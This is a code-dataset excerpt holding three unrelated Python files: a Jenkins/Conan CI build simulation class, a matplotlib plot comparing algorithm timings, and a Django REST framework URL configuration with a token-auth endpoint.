3265070 | <filename>src/cicd_sim/buildmachine/jenkins.py
from .. util.stdoutput import StdOutput
from .. conan import Conan
from . buildstrategy_a import BuildStrategyA
class Jenkins:
    """ A Jenkins simulation. It supports 'building a branch' which results in an artifact.
    Depending on the 'build strategy', that artifact gets a version and may be published
    to an 'artifactory'.
    :config: Dict that may optionally specify the following keys: `conan`, `output` and
    `build_strategy`. For each key, defaults are used if they're not defined.
    """
    def __init__(self, artifactory, repos, config = {}):
        # NOTE(review): mutable default config={} is shared across instances;
        # it is only read here, but confirm callers never mutate it.
        self._artifactory = artifactory
        self._repos = repos
        self._setup(config)
        # Maps branch description -> requires resolved at its last build;
        # used to detect when a branch needs rebuilding.
        self._remember_built_branches = {}
        self._register_build_hooks()
    def _setup(self, config):
        """Resolve collaborators from *config*, falling back to defaults."""
        self._conan = config['conan'] if 'conan' in config else Conan()
        self._output = config['output'] if 'output' in config else StdOutput()
        self._build_strategy = config['build_strategy'] if 'build_strategy' in config else BuildStrategyA()
    def _register_build_hooks(self):
        """Let the repositories call back into this build machine on pushes."""
        self._repos.set_buildmachine(self)
    def build(self, branch):
        """Build a Git branch.
        This means:
        - Execute `Conan install` to install requirements
        - It creates an artifact with an identifier
        - The artifact gets published to artifactory
        Finally, Jenkins iterates through all repositories (i.e. 'projects')
        and checks whether the new artifact will change the version that'd be
        taken by `conan install` because of the newly created artifact.
        """
        self._output.building(branch)
        resolved_requires = self._conan.install(branch, self._artifactory.get_artifacts())
        if self._build_strategy.shall_publish_artifact(branch):
            artifact_version = self._build_strategy.generate_artifact_version(branch)
            self._publish_artifact(branch, artifact_version)
        self._remember_built_artifact(branch, resolved_requires)
        self.check_repos_require_build()
    def check_repos_require_build(self):
        """Check if projects need to be rebuilt because their 'requires' have
        new artifacts. E.g. if a library artifact gets added, the application
        may need a rebuild."""
        for repo in self._repos.get_repos():
            for branch in repo.get_branches():
                resolved_requires, _ = self._conan.resolve_requires(self._artifactory.get_artifacts(), branch)
                # Rebuild only when resolution succeeded and differs from
                # what was recorded at the branch's last build.
                if resolved_requires and self._is_artifact_rebuild_required(branch, resolved_requires):
                    self.build(branch)
    def _remember_built_artifact(self, branch, resolved_requires):
        """Record the requires used for this branch's latest build."""
        project_desc = branch.get_description(True)
        self._remember_built_branches[project_desc] = resolved_requires
    def _is_artifact_rebuild_required(self, branch, resolved_requires):
        """Return True when the branch's requires now resolve differently
        than at its last recorded build (or it was never built)."""
        project_desc = branch.get_description(True)
        branch_built_before = self._remember_built_branches.get(project_desc)
        return resolved_requires != branch_built_before
    def _publish_artifact(self, branch, version):
        """Report and upload a freshly built artifact version."""
        descr = branch.get_description(colorized = True)
        self._output.publish(branch.get_project_name(), descr, version)
        self._artifactory.publish(branch.get_project_name(), version)
| StarcoderdataPython |
4907138 | <reponame>romeorizzi/TALight
#!/usr/bin/env python3
from sys import stderr, exit
import random
from time import monotonic
import matplotlib.pyplot as plt
def plotting(data, figure_size):
    """Plot efficiency comparisons and show the figure.

    data: list of (name, n, t_no_efficient, t_efficient) tuples, where n is
    the x-axis sample sizes and the two t_* sequences are matching timing
    series.  Each tuple gets a row of two subplots: raw times side by side,
    and their difference.  figure_size: (width, height) in inches.
    """
    # plotting settings
    plt.figure(figsize = figure_size)
    counter = 1  # 1-based subplot index; advances by 2 per dataset row
    for i in range(len(data)):
        # extract data
        name = data[i][0]
        n = data[i][1]
        t_no_efficient = data[i][2]
        t_efficient = data[i][3]
        assert len(t_no_efficient) == len(t_efficient)
        # (the comprehension's i shadows the outer loop variable only
        # inside the comprehension scope, so the outer i is unaffected)
        diff = [t_no_efficient[i] - t_efficient[i] for i in range(len(t_no_efficient))]
        # print stats
        print(f'n={n}')
        print(f'last_no_eff={t_no_efficient[-1]}')
        print(f'last_eff={t_efficient[-1]}')
        print(f'last_diff={diff[-1]}')
        print()
        # plotting times comparison (left column)
        plt.subplot(len(data), 2, counter)
        plt.title(f'{name}',fontweight="bold", loc="right")
        plt.plot(n, t_no_efficient, marker = 'o', color='b', label='only_correct')
        plt.plot(n, t_efficient, marker = 'o', color='g', label='also_efficient')
        plt.legend(loc="upper left")
        plt.xlabel('N')
        plt.ylabel('times (seconds)')
        plt.grid(color = 'green', linestyle = '--', linewidth = 0.5)
        # plotting difference (right column)
        plt.subplot(len(data), 2, counter+1)
        plt.plot(n, diff, marker = 'o', color='r', label='difference')
        plt.legend(loc="upper left")
        plt.xlabel('N')
        plt.ylabel('difference (seconds)')
        plt.grid(color = 'green', linestyle = '--', linewidth = 0.5)
        #update counter
        counter += 2
    plt.suptitle('EFFICIENCY COMPARISON',fontweight="bold")
    plt.show()
| StarcoderdataPython |
4866159 |
from django.contrib import admin
from django.conf.urls import *
from django.urls import include, path
from rest_framework import routers
from rest_framework.authtoken.views import obtain_auth_token
from api import views
# Discover admin modules from all installed apps.
admin.autodiscover()
# DRF router generates list/detail routes for both registered viewsets.
router = routers.DefaultRouter()
router.register(r'machines', views.MachineViewSet)
router.register(r'customers', views.CustomerViewSet)
urlpatterns = [
    path('admin/', admin.site.urls),
    url(r'^_nested_admin/', include('nested_admin.urls')),
    path('', include(router.urls)),
    # POST username/password here to obtain a DRF auth token.
    path('api-token-auth/', obtain_auth_token, name='api_token_auth'),
]
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.